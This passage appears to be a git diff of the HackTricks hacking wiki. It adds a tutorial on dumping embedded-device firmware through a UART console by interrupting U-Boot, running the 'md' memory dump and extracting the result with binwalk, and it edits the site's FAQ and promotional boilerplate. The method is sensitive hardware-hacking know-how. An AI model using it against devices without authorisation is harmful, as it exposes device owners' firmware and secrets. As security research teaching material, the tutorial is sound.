waiting a few secs to repeat....
|
waiting a few secs to repeat....
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Dumping Firmware with UART Console
|
||||||
|
|
||||||
|
UART Console provides a great way to work with the underlying firmware in runtime environment. But when the UART Console access is read-only, it might introduce a lot of constrains. In many embedded devices, the firmware is stored in EEPROMs and executed in processors that have volatile memory. Hence, the firmware is kept read-only since the original firmware during manufacturing is inside the EEPROM itself and any new files would get lost due to volatile memory. Hence, dumping firmware is a valuable effort while working with embedded firmwares.
|
||||||
|
|
||||||
|
There are a lot of ways to do this and the SPI section covers methods to extract firmware directly from the EEPROM with various devices. Although, it is recommended to first try dumping firmware with UART since dumping firmware with physical devices and external interactions can be risky.
|
||||||
|
|
||||||
|
Dumping firmware from UART Console requires first getting access to bootloaders. Many popular vendors make use of <b>uboot</b> (Universal Bootloader) as their bootloader to load Linux. Hence, getting access to <b>uboot</b> is necessary.
|
||||||
|
|
||||||
|
To get access to <b>boot</b> bootloader, connect the UART port to the computer and use any of the Serial Console tools and keep the power supply to the device disconnected. Once the setup is ready, press the Enter Key and hold it. Finally, connect the power supply to the device and let it boot.
|
||||||
|
|
||||||
|
Doing this will interrupt <b>uboot</b> from loading and will provide a menu. It is recommended to understand <b>uboot</b> commands and using help menu to list them. This might be `help` command. Since different vendors use different configurations, it is necessary to understand each of them seperately.
|
||||||
|
|
||||||
|
Usually, the command to dump the firmware is:
|
||||||
|
```
|
||||||
|
md
|
||||||
|
```
|
||||||
|
which stands for "memory dump". This will dump the memory (EEPROM Content) on the screen. It is recommended to log the Serial Console output before starting the proceedure to capture the memory dump.
|
||||||
|
|
||||||
|
Finally, just strip out all the unnecessary data from the log file and store the file as `filename.rom` and use binwalk to extract the contents:
|
||||||
|
```
|
||||||
|
binwalk -e <filename.rom>
|
||||||
|
```
|
||||||
|
This will list the possible contents from the EEPROM as per the signatures found in the hex file.
|
||||||
|
|
||||||
|
Although, it is necessary to note that it's not always the case that the <b>uboot</b> is unlocked even if it is being used. If the Enter Key doesn't do anything, check for different keys like Space Key, etc. If the bootloader is locked and does not get interrupted, this method would not work. To check if <b>uboot</b> is the bootloader for the device, check the output on the UART Console while booting of the device. It might mention <b>uboot</b> while booting.
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -9,7 +9,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -105,17 +105,21 @@ You won't find HackTricks filled with annoying ads like other blogs with much le
|
||||||
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
In any case know that HackTricks in this case would be improving your **SEO** and **encouraging** people to **check your page** (people has mentioned us that since some page of them is in HackTricks they receive more visits). If you still want the content of your blog to be removed from HackTricks let us know.
|
Note that having links to your page in HackTricks:
|
||||||
|
|
||||||
Note that asking this we will definitely **remove every link to your blog**, and any content based on it.
|
* Improve your **SEO**
|
||||||
|
* The content gets **translated to more than 15 languages** making possible for more people to access this content
|
||||||
|
* **HackTricks encourages** people to **check your page** (several people has mentioned us that since some page of them is in HackTricks they receive more visits)
|
||||||
|
|
||||||
|
However, If you still want the content of your blog to be removed from HackTricks just let us know and we will definitely **remove every link to your blog**, and any content based on it.
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
* **What should I do if I find copy-pasted content in HackTricks?**
|
* **What should I do if I find copy-pasted content in HackTricks?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
**Unfortunatelly this practice might have happened in the beginning of the project when this page was just the notes of a pentester**. We always try to **give the original authors all the credits**. If you find a page with copy-pasted content (even with the original source referenced), let us know and we will either **remove it**, **leave the link**, or **rewrite it**.
|
We always **give the original authors all the credits**. If you find a page with copy-pasted content without original source referenced, let us know and we will either **remove it**, **add the link before the text**, or **rewrite it adding the link**.
|
||||||
|
|
||||||
## LICENSE 
|
## LICENSE
|
||||||
|
|
||||||
Copyright © All rights reserved unless otherwise specified.
|
Copyright © All rights reserved unless otherwise specified.
|
||||||
|
|
||||||
|
@ -161,7 +165,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|